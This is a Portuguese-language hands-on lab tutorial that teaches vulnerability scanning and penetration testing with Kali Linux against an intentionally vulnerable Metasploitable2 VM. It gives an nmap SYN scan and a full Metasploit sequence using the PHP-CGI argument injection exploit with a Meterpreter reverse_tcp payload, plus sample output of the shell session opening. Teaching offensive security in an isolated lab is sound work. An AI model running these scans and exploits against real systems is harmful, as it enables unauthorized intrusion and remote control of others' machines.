Introdução
Neste laboratório, você aprenderá como realizar a varredura de vulnerabilidades (vulnerability scanning) e testes de penetração (penetration testing) em uma máquina alvo usando várias ferramentas no Kali Linux. O objetivo é obter experiência prática com ferramentas populares de varredura de vulnerabilidades e entender como aproveitar os resultados para conduzir ataques de penetração bem-sucedidos. O laboratório será conduzido na plataforma LabEx, onde você receberá um container Kali Linux como máquina de ataque e uma máquina virtual Metasploitable2 como alvo.
Configurando o Ambiente
Nesta etapa, você iniciará o container Kali Linux e a máquina alvo Metasploitable2 na plataforma LabEx.
- Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2
Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.
- Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102
Pressione Ctrl+C para parar o ping.
- Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102
Pressione Ctrl+C para parar o ping.
Realizando a Varredura de Vulnerabilidades com Nmap
Nesta etapa, você aprenderá sobre algumas ferramentas populares de varredura de vulnerabilidades disponíveis no Kali Linux.
X-scan: X-scan é uma ferramenta de varredura abrangente bem conhecida na China. É totalmente gratuita, não requer instalação e suporta interfaces gráficas e de linha de comando em chinês e inglês. X-scan é desenvolvido por um renomado grupo de hackers chinês chamado "Security Focus" e tem sido constantemente aprimorado desde sua versão de teste interna 0.2 em 2000.
Nessus: Nessus é um dos softwares de varredura e análise de vulnerabilidades mais amplamente utilizados no mundo. Mais de 75.000 organizações usam o Nessus para escanear seus sistemas de computador. Nessus foi criado por Renaud Deraison em 1998 com o objetivo de fornecer um programa de varredura de segurança de sistema remoto gratuito, poderoso, frequentemente atualizado e fácil de usar para a comunidade da internet.
SQLmap: SQLmap é uma ferramenta automática de injeção SQL que pode escanear, detectar e explorar vulnerabilidades de injeção SQL em uma determinada URL. Atualmente, ele suporta bancos de dados MS-SQL, MySQL, Oracle e PostgreSQL. SQLmap emprega quatro técnicas exclusivas de injeção SQL: inferência cega, consultas UNION, consultas empilhadas e injeção cega baseada em tempo.
Nmap: Nmap é uma ferramenta poderosa e versátil de exploração de rede e auditoria de segurança. Ele pode ser usado para vários propósitos, incluindo descoberta de rede, varredura de portas e detecção de vulnerabilidades.
Agora, você usará o Nmap para realizar uma varredura de vulnerabilidades na máquina alvo Metasploitable2.
- Inicie o serviço de banco de dados Metasploit e inicialize o banco de dados:
cd ~
service postgresql start
msfdb init
- Inicie o console Metasploit:
msfconsole
- Dentro do console Metasploit, use o comando
nmappara escanear a máquina alvo:
nmap -sS -T4 192.168.122.102
Aqui está um exemplo da saída que você pode ver:
[*] exec: nmap -sS -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
O parâmetro -sS executa uma varredura TCP SYN (também conhecida como varredura half-open ou stealth), e -T4 define a política de tempo para ser agressiva, mas não muito rápida para evitar tráfego de rede excessivo.
- Observe a saída da varredura, que deve exibir as portas e serviços abertos na máquina alvo.
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Explorando uma Vulnerabilidade
Nesta etapa, você usará as informações coletadas da varredura Nmap para explorar uma vulnerabilidade na máquina alvo Metasploitable2.
- Antes de tudo, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:
cd ~
msfconsole
- A partir dos resultados da varredura Nmap, identifique uma porta aberta na máquina alvo, por exemplo, a porta 80. No console Metasploit, procure um módulo de exploit relacionado à porta aberta:
search http
- Use o módulo de exploit apropriado:
use exploit/multi/http/php_cgi_arg_injection
- Defina o endereço IP da máquina alvo:
set RHOST 192.168.122.102
- Defina o payload a ser usado:
set PAYLOAD php/meterpreter/reverse_tcp
- Defina o endereço IP da máquina local:
set LHOST 192.168.122.1
- Execute o exploit:
exploit
Aqui está um exemplo da saída que você pode ver:
[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
Se o exploit for bem-sucedido, você deverá obter acesso ao shell da máquina alvo. Verifique o acesso executando comandos como
sysinfopara exibir informações do sistema.Se tiver tempo, você pode tentar explorar outras ferramentas de varredura de vulnerabilidades, como Nessus, SQLmap ou X-scan. Você também pode tentar explorar diferentes vulnerabilidades na máquina alvo Metasploitable2.
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Resumo
Neste laboratório, você aprendeu como configurar um ambiente Kali Linux para testes de penetração e usar ferramentas populares de varredura de vulnerabilidades, como Nmap, para identificar potenciais vulnerabilidades em um sistema alvo. Você também adquiriu experiência prática na exploração de uma vulnerabilidade usando o Metasploit Framework. Este conhecimento prático o ajudará a entender a importância da varredura de vulnerabilidades e dos testes de penetração no campo da segurança cibernética.



